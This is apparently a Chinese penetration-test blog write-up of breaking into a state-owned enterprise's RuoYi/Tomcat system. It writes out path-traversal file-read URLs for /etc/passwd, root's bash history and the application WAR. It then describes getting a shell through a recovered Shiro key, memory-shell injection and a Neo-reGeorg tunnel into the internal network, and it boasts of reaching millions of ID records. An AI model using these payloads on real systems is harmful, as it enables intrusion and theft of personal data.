案例分享 | 记一次对大型国企Ruoyi系统曲折的打点测试But lucky~
|字数总计:7.8k|阅读时长:32分钟|阅读量:
前言
从一个注册接口到打穿内网再到找到大量敏感信息。记录一下这次曲折且幸运的测试
目标是一家大型国企,打完发现里面有400w+身份证、手机号 [doge]
资产打点
前期拿到主域通过搜集子域找到了一堆Ruoyi的系统:
随便找几个访问,发现是很经典低版本的Ruoyi,并且填上了账号密码admin admin123:
但是密码登录失败
一般低版本Ruoyi系统都存在Shiro 默认key的漏洞,用检测工具可以打,但是这个系统改了key,通过爆破也找不到key
这个时候就有点懵逼了,只好看下别的ruoyi系统会不会有洞。
漏洞发现
然后刚好测试到下面这个站:
看了眼源码,发现了一段注册接口的注释,路由/register
这个时候赶紧去访问,发现确实能注册用户!!
(后续测试别的ruoyi系统发现只有我这个系统能注册用户,别的站能访问注册页面但是没有权限注册)
这个时候就进入后台了,但是没有什么功能点
但是因为有了Cookie,所以很多Ruoyi的历史漏洞都可以测试了(很多漏洞都需要后台Cookie才能测),所以这里就用工具测试了下有哪些漏洞。
任意文件读取
发现存在CNVD-2021-01931 任意文件读取漏洞
访问接口读取/etc/passwd
/common/download/resource?resource=/profile/../../../../../../../etc/passwd
|
并且用户权限很高,/root/的目录所有文件都能读取,那么第一步肯定是看root的历史记录:
/common/download/resource?resource=/profile/../../../../../../../root/.bash_history
|
日志如下:
#1713754877
ln -sf /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
#1713754878
date
#1713754897
yum install -y kde-l10n-Chinese
#1713754943
yum reinstall -y glibc-common
#1713754952
localedef -c -f UTF-8 -i zh_CN zh_CN.UFT-8
#1713754957
locale -a
#1713755138
cd data/software/
#1713755139
ls
#1713755146
cp -rf /data/software/jdk1.8 /data
#1713755150
cp -rf /data/software/tomcat-8.5.100 /data
#1713755155
cd /data/
#1713755155
ls
#1713755168
cd /usr/share/
#1713755174
mkdir fonts
#1713755177
cd fonts/
#1713755184
mkdir chinese
#1713755187
cd chinese/
#1713755196
mkdir TrueType
#1713755197
ls
#1713755201
cd /data/
#1713755207
cp /data/software/MSYH.TTF /usr/share/fonts/chinese/TrueType
#1713755211
cp /data/software/MSYHBD.TTF /usr/share/fonts/chinese/TrueType
#1713755222
cd /usr/share/fonts/chinese/TrueType/
#1713755222
ls
#1713755225
cd /data/
#1713755231
yum install mkfontscale
#1713755238
mkfontscale
#1713755243
mkfontdir
#1713755249
yum install fontconfig
#1713755258
fc-cache -fv
#1713755265
vi /etc/profile
#1713755296
source /etc/profile
#1713755301
cd /data
#1713755357
chmod -R 777 jdk1.8/
#1713755362
chmod -R 777 tomcat-8.5.100/
#1713755364
ls
#1713755369
java -version
#1713755376
touch start.sh
#1713755379
ls
#1713755386
chmod 777 start.sh
#1713755391
vi start.sh
#1713755413
exit
ls
cd data/
ls
exit
cd /data/
ls
cat /etc/profile
ls
cat start.sh
vi start.sh
exit
|
思路(翻日志)
其实没有给特别好的信息,但是好在我们知道了tomcat的绝对路径/data/tomcat-8.5.100/ 也知道了这个站是用tomcat搭的Ruoyi系统。
扫过端口只有网页端口开放,且没有tomcat默认页(/manager/html用不了),所以当时的思路就是通过找到ruoyi.jar包,再解包得到里面的配置信息,里面会记录shiro key值,最后我们再用Shiro来getshell。
百度了下tomcat咋部署若依,发现其路径就是在tomcat/webapps的某个.war包
那么当下最要紧的事情就是找到tomcat的日志,找到这个包的包名。
tomcat常见日志文件:
/logs/catalina.out
/logs/catalina.Y-M-D.log
/logs/manager.Y-M-D.log
/logs/host-manager.Y-M-D.log
/logs/localhost_access_log.Y-M-D.txt
|
当时我只测了logs/catalina.out,发现不存在!!
转折
当时发现日志没有就在找别的办法,所以是有测试过这些其他的日志名+日期的,然后发现找不到直接挫败了,于是乎我就搜tomcat日志的配置文件,尝试找到其后缀,但是一套操作下来发现还是找不到。。
后面我找到了/conf/service.xml,发现了这么一段内容:
找到了localhost日志的后缀,因为当时还没想到fuzz 上面tomcat的日志名的思路嘛,然后看到这个直接就有想法了,构造了localhost_access_log.2024-05-24.txt,然后访问,我去真有!!
直接点燃信心了好吧,然后翻阅内容就是一些访问记录,有泄露内网IP和接口,没什么大用
找到关键信息(劳大发力)
(这里日期我随便填了个24,后面打进去我找logs文件夹下的日志文件,我发现我这随手一填的数字构造的日志名,是所有日志文件里唯一的一份!!太欧了。。劳大也在帮助我!!)
(MAN!)
然后就有思路了呀,因为5月24日的日志有了,那肯定catalina.out也有,然后这个时候就找到了tomcat的常见日志名,逐个fuzz了一下 最终找到了文件:logs/catalina.2024-05-24.log
这可是好东西呀,里面给了很多有用的信息
24-May-2024 14:16:02.717 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.服务器版本: Apache Tomcat/8.5.100
24-May-2024 14:16:02.722 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器构建: Mar 19 2024 13:54:42 UTC
24-May-2024 14:16:02.722 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器版本号: 8.5.100.0
24-May-2024 14:16:02.722 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 操作系统名称: Linux
24-May-2024 14:16:02.722 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS.版本: 4.18.0-477.10.1.el8_8.x86_64
24-May-2024 14:16:02.722 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 架构: amd64
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java 环境变量: /data/jdk1.8/jre
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java虚拟机版本: 1.8.0_301-b09
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM.供应商: Oracle Corporation
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE: /data/tomcat-8.5.100
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME: /data/tomcat-8.5.100
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Djava.util.logging.config.file=/data/tomcat-8.5.100/conf/logging.properties
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
24-May-2024 14:16:02.723 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Djdk.tls.ephemeralDHKeySize=2048
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Djava.protocol.handler.pkgs=org.apache.catalina.webresources
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Dorg.apache.catalina.security.SecurityListener.UMASK=0027
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Dignore.endorsed.dirs=
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Dcatalina.base=/data/tomcat-8.5.100
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Dcatalina.home=/data/tomcat-8.5.100
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数: -Djava.io.tmpdir=/data/tomcat-8.5.100/temp
24-May-2024 14:16:02.724 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent 在java.library.path:[/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib]上找不到基于APR的Apache Tomcat本机库,该库允许在生产环境中获得最佳性能
24-May-2024 14:16:02.949 信息 [main] org.apache.coyote.AbstractProtocol.init 初始化协议处理器 ["http-nio-8080"]
24-May-2024 14:16:02.977 信息 [main] org.apache.catalina.startup.Catalina.load Initialization processed in 943 ms
24-May-2024 14:16:03.027 信息 [main] org.apache.catalina.core.StandardService.startInternal 正在启动服务[Catalina]
24-May-2024 14:16:03.027 信息 [main] org.apache.catalina.core.StandardEngine.startInternal 正在启动 Servlet 引擎:[Apache Tomcat/8.5.100]
24-May-2024 14:16:03.066 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR 正在部署web应用程序存档文件[/data/tomcat-8.5.100/webapps/ROOT.war]
24-May-2024 14:16:04.606 警告 [localhost-startStop-1] org.apache.tomcat.util.descriptor.web.WebXml.setVersion 未知版本字符串 [4.0]。将使用默认版本。
24-May-2024 14:16:04.730 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/fonts/fontawesome-webfont.svg]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.731 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/fonts/fontawesome-webfont.eot]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.732 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/fonts/glyphicons-halflings-regular.eot]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.732 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/fonts/glyphicons-halflings-regular.svg]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.732 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/fonts/fontawesome-webfont.woff]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.733 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/delete.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.734 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/loading.gif]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.734 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/se-handle-dark.gif]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.734 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/shapemenu_highlight.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.735 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/bpmn-error.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.735 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/bpmn-warning.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.736 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/nw-handle-dark.gif]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.736 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/pencil.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.736 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/report_edit.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.737 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/images/wrench.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.737 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/remove-bendpoint-hover.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.738 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/grid.gif]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.738 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-align-horizontal-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.738 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-align-vertical.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.739 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-same-size-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.739 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-zoom-actual.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.739 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/kis_logo.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.740 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/add-bendpoint-hover.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.740 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-add-bendpoint-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.740 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-align-horizontal.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.741 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-remove-bendpoint-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.741 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-same-size.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.741 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-zoom-fit-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.742 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/remove-bendpoint.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.742 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/add-bendpoint.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.742 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-add-bendpoint.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.742 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-align-vertical-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.743 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-remove-bendpoint.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.743 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-zoom-actual-selected.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.743 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/img-kis/icon-zoom-fit.png]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.744 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/ui-utils.min-0.2.1.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.744 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/jquery.autogrow-textarea.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.745 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/update-helper.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.745 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/prototype-1.7.3.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.745 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/path_parser.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.745 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/prototype-1.6.1.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.746 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/mousetrap/1.6.0]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.746 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/mousetrap/1.6.0/mousetrap-record.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.746 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/mousetrap/1.6.0/mousetrap.min.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.747 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/libs/mousetrap/1.6.0/mousetrap.js]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.747 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/partials/stencil-item-template.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.747 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/partials/process-tree-list.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.748 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/partials/root-stencil-item-template.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.748 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/unsaved-changes.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.749 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/select-shape.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.749 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/save-model.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.749 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/define-data.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.749 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/validate-model.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.750 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/popups/icon-template.html]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.750 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/stencilsets/bpmn2.0]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.750 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/stencilsets/cmmn1.1]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.751 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/stencilsets/xforms]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.751 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/stencilsets/bpmn2.0/icons]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:04.752 警告 [localhost-startStop-1] org.apache.catalina.webresources.Cache.getResource 无法将位于[/WEB-INF/classes/static/modeler/editor-app/stencilsets/bpmn2.0/icons/activity]的资源添加到Web应用程序[]的缓存中,因为在清除过期缓存条目后可用空间仍不足 - 请考虑增加缓存的最大空间。
24-May-2024 14:16:11.879 信息 [localhost-startStop-1] org.apache.jasper.servlet.TldScanner.scanJars 至少有一个JAR被扫描用于TLD但尚未包含TLD。 为此记录器启用调试日志记录,以获取已扫描但未在其中找到TLD的完整JAR列表。 在扫描期间跳过不需要的JAR可以缩短启动时间和JSP编译时间。
24-May-2024 14:16:24.386 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployWAR web应用程序存档文件[/data/tomcat-8.5.100/webapps/ROOT.war]的部署已在[21,318]ms内完成
24-May-2024 14:16:24.388 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [/data/tomcat-8.5.100/webapps/manager]
24-May-2024 14:16:24.420 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[/data/tomcat-8.5.100/webapps/manager]的部署已在[32]毫秒内完成
24-May-2024 14:16:24.420 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [/data/tomcat-8.5.100/webapps/docs]
24-May-2024 14:16:24.433 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[/data/tomcat-8.5.100/webapps/docs]的部署已在[13]毫秒内完成
24-May-2024 14:16:24.433 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [/data/tomcat-8.5.100/webapps/host-manager]
24-May-2024 14:16:24.451 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[/data/tomcat-8.5.100/webapps/host-manager]的部署已在[18]毫秒内完成
24-May-2024 14:16:24.451 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [/data/tomcat-8.5.100/webapps/examples]
24-May-2024 14:16:24.585 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[/data/tomcat-8.5.100/webapps/examples]的部署已在[134]毫秒内完成
24-May-2024 14:16:24.594 信息 [main] org.apache.coyote.AbstractProtocol.start 开始协议处理句柄["http-nio-8080"]
24-May-2024 14:16:24.614 信息 [main] org.apache.catalina.startup.Catalina.start Server startup in 21636 ms
|
直接就给了war包的路径/data/tomcat-8.5.100/webapps/ROOT.war(当时看到这个一刻就在想,当时咋就不试下ROOT.war呢?省了两个小时翻日志的垃圾时间)
这个时候我已经在笑了hh。。
构造url下载这个文件 大小有100多MB
/common/download/resource?resource=/profile/../../../../../../../data/tomcat-8.5.100/webapps/ROOT.war
|
然后解压到本地分析,其他路径都是编写类的java文件直接忽略不看,主要看这个路径
里面包含了配置、模板静态文件
Getshell + 内网横向拿下3台机子
这个时候找到application.yml和application-druid.yml ,里面就有我们千辛万苦想找的Shiro key了!!
然后还有数据库账号密码和SMTP邮箱账号密码
之后就是拿Shiro工具填上密钥一把梭!!这里要记得勾上 AES GCM 这个选项,否则会打不通。
然后这个shiro工具刚好可以注入内存马,还可以注入Neo-regeorg马,建立socks5。这个时候先是注的冰蝎、然后再用Neo-regeorg代理个socks5出来
Neo-regeorg:
这个机子是10.88.0.24,通过之前读日志能发现主内网IP段在10.10.103.0/24,所以这个时候用neo弄个socks5隧道,通过隧道去测试10.10.103.0/24网段
